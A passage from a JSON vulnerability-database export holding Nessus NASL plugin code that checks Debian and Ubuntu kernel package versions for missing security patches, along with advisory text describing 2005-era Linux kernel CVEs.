prefix:\"kernel-headers-2.4.27-3-k7\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-k7-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-mckinley\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-mckinley-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-sparc32\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-sparc32-smp\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-sparc64\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-sparc64-smp\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-apus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-nubus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-powerpc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-speakup\", reference:\"2.4.27-1.1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-386\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-586tsc\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-686\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-686-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-generic\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-itanium\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-itanium-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-k6\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-k7\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-k7-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-mckinley\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-mckinley-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-s390\", reference:\"2.4.27-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-s390x\", reference:\"2.4.27-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-sparc32\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-sparc32-smp\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-sparc64\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4-sparc64-smp\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-386\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-586tsc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-686\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-686-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-generic\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-itanium\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-itanium-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-k6\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-k7\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-k7-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-mckinley\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-mckinley-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-s390\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-s390-tape\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-s390x\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-sparc32\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-sparc32-smp\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-sparc64\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-3-sparc64-smp\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-amiga\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-apus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-atari\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-bast\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-bvme6000\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-lart\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-mac\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-mvme147\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-mvme16x\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-netwinder\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-nubus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-powerpc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-powerpc-small\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-powerpc-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-q40\", reference:\"2.4.27-3sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r3k-kn02\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r4k-ip22\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r4k-kn04\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r5k-cobalt\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r5k-ip22\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-r5k-lasat\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-riscpc\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-riscstation\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-sb1-swarm-bn\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-speakup\", reference:\"2.4.27-1.1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-image-2.4.27-xxs1500\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.4-i2c\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.4-lm-sensors\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.4.27-apus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.4.27-nubus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-2.4.27-powerpc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-patch-debian-2.4.27\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-386\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-586tsc\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-686\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-686-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-k6\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-k7\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4-k7-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-386\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-586tsc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-686\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-686-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-k6\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-k7\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-pcmcia-modules-2.4.27-3-k7-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-source-2.4.27\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-tree-2.4.27\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libsensors-dev\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libsensors3\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-386\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-586tsc\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-686\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-686-smp\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-k6\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-k7\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-2.4.27-3-k7-smp\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lm-sensors-source\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mindi-kernel\", reference:\"2.4.27-2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mips-tools\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-386\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-586tsc\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-686\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-686-smp\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-k6\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-k7\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"pcmcia-modules-2.4.27-3-k7-smp\", reference:\"3.2.5+2sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"sensord\", reference:\"2.9.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-boot-i386-standard\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-boot-ia64-standard\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-client\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-common\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-doc\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-server\", reference:\"3.2.3-6sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"systemimager-server-flamethrowerd\", reference:\"3.2.3-6sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T15:27:40", "description": "Rudolf Polzer reported an abuse of the 'loadkeys' command. By\nredefining one or more keys and tricking another user (like root) into\nlogging in on a text console and typing something that involves the\nredefined keys, a local user could cause execution of arbitrary\ncommands with the privileges of the target user. The updated kernel\nrestricts the usage of 'loadkeys' to root. (CVE-2005-3257)\n\nThe ptrace() system call did not correctly check whether a process\ntried to attach to itself. A local attacker could exploit this to\ncause a kernel crash. (CVE-2005-3783)\n\nA Denial of Service vulnerability was found in the handler that\nautomatically cleans up and terminates child processes that are not\ncorrectly handled by their parent process ('auto-reaper'). The check\ndid not correctly handle processes which were currently traced by\nanother process. A local attacker could exploit this to cause a kernel\ncrash. (CVE-2005-3784)\n\nA locking problem was discovered in the POSIX timer cleanup handling\non process exit. A local attacker could exploit this to cause the\nmachine to hang (Denial of Service). This flaw only affects\nmultiprocessor (SMP) systems. (CVE-2005-3805)\n\nA Denial of Service vulnerability was discovered in the IPv6 flowlabel\nhandling code. By invoking setsockopt(IPV6_FLOWLABEL_MGR) in a special\nway, a local attacker could cause memory corruption which eventually\nled to a kernel crash. (CVE-2005-3806)\n\nA memory leak was discovered in the VFS lease handling. These\noperations are commonly executed by the Samba server, which led to\nsteady memory exhaustion. By repeatedly triggering the affected\noperations in quick succession, a local attacker could exploit this to\ndrain all memory, which leads to a Denial of Service. (CVE-2005-3807)\n\nAn integer overflow was discovered in the\ninvalidate_inode_pages2_range() function. By issuing 64-bit mmap calls\non a 32 bit system, a local user could exploit this to crash the\nmachine, thereby causing Denial of Service. This flaw does not affect\nthe amd64 platform, and does only affect Ubuntu 5.10. (CVE-2005-3808)\n\nOllie Wild discovered a memory leak in the icmp_push_reply() function.\nBy sending a large amount of specially crafted packets, a remote\nattacker could exploit this to drain all memory, which eventually\nleads to a Denial of Service. (CVE-2005-3848)\n\nChris Wrigth found a Denial of Service vulnerability in the\ntime_out_leases() function. By allocating a large number of VFS file\nlock leases and having them timeout at the same time, a large number\nof 'printk' debugging statements was generated at the same time, which\ncould exhaust kernel memory. (CVE-2005-3857)\n\nPatrick McHardy discovered a memory leak in the ip6_input_finish()\nfunction. A remote attacker could exploit this by sending specially\ncrafted IPv6 packets, which would eventually drain all available\nkernel memory, thus causing a Denial of Service. (CVE-2005-3858).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : linux-source-2.6.8.1/-2.6.10/-2.6.12 vulnerabilities (USN-231-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-3858", "CVE-2005-3805", "CVE-2005-3807", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-3808", "CVE-2005-3857"], "modified": "2006-01-21T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.12", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-xeon", "p-cpe:/a:canonical:ubuntu_linux:linux-patch-ubuntu-2.6.12", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.10", "p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.12", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.10", "p-cpe:/a:canonical:ubuntu_linux:linux-patch-ubuntu-2.6.10", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.8.1", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.12", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-k8", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686", "p-cpe:/a:canonical:ubuntu_linux:linux-patch-debian-2.6.8.1", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386"], "id": "UBUNTU_USN-231-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20775", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-231-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20775);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-3257\", \"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-3805\", \"CVE-2005-3806\", \"CVE-2005-3807\", \"CVE-2005-3808\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\");\n script_xref(name:\"USN\", value:\"231-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : linux-source-2.6.8.1/-2.6.10/-2.6.12 vulnerabilities (USN-231-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rudolf Polzer reported an abuse of the 'loadkeys' command. By\nredefining one or more keys and tricking another user (like root) into\nlogging in on a text console and typing something that involves the\nredefined keys, a local user could cause execution of arbitrary\ncommands with the privileges of the target user. The updated kernel\nrestricts the usage of 'loadkeys' to root. (CVE-2005-3257)\n\nThe ptrace() system call did not correctly check whether a process\ntried to attach to itself. A local attacker could exploit this to\ncause a kernel crash. (CVE-2005-3783)\n\nA Denial of Service vulnerability was found in the handler that\nautomatically cleans up and terminates child processes that are not\ncorrectly handled by their parent process ('auto-reaper'). The check\ndid not correctly handle processes which were currently traced by\nanother process. A local attacker could exploit this to cause a kernel\ncrash. (CVE-2005-3784)\n\nA locking problem was discovered in the POSIX timer cleanup handling\non process exit. A local attacker could exploit this to cause the\nmachine to hang (Denial of Service). This flaw only affects\nmultiprocessor (SMP) systems. (CVE-2005-3805)\n\nA Denial of Service vulnerability was discovered in the IPv6 flowlabel\nhandling code. By invoking setsockopt(IPV6_FLOWLABEL_MGR) in a special\nway, a local attacker could cause memory corruption which eventually\nled to a kernel crash. (CVE-2005-3806)\n\nA memory leak was discovered in the VFS lease handling. These\noperations are commonly executed by the Samba server, which led to\nsteady memory exhaustion. By repeatedly triggering the affected\noperations in quick succession, a local attacker could exploit this to\ndrain all memory, which leads to a Denial of Service. (CVE-2005-3807)\n\nAn integer overflow was discovered in the\ninvalidate_inode_pages2_range() function. By issuing 64-bit mmap calls\non a 32 bit system, a local user could exploit this to crash the\nmachine, thereby causing Denial of Service. This flaw does not affect\nthe amd64 platform, and does only affect Ubuntu 5.10. (CVE-2005-3808)\n\nOllie Wild discovered a memory leak in the icmp_push_reply() function.\nBy sending a large amount of specially crafted packets, a remote\nattacker could exploit this to drain all memory, which eventually\nleads to a Denial of Service. (CVE-2005-3848)\n\nChris Wrigth found a Denial of Service vulnerability in the\ntime_out_leases() function. By allocating a large number of VFS file\nlock leases and having them timeout at the same time, a large number\nof 'printk' debugging statements was generated at the same time, which\ncould exhaust kernel memory. (CVE-2005-3857)\n\nPatrick McHardy discovered a memory leak in the ip6_input_finish()\nfunction. A remote attacker could exploit this by sending specially\ncrafted IPv6 packets, which would eventually drain all available\nkernel memory, thus causing a Denial of Service. (CVE-2005-3858).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6.8.1-6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", 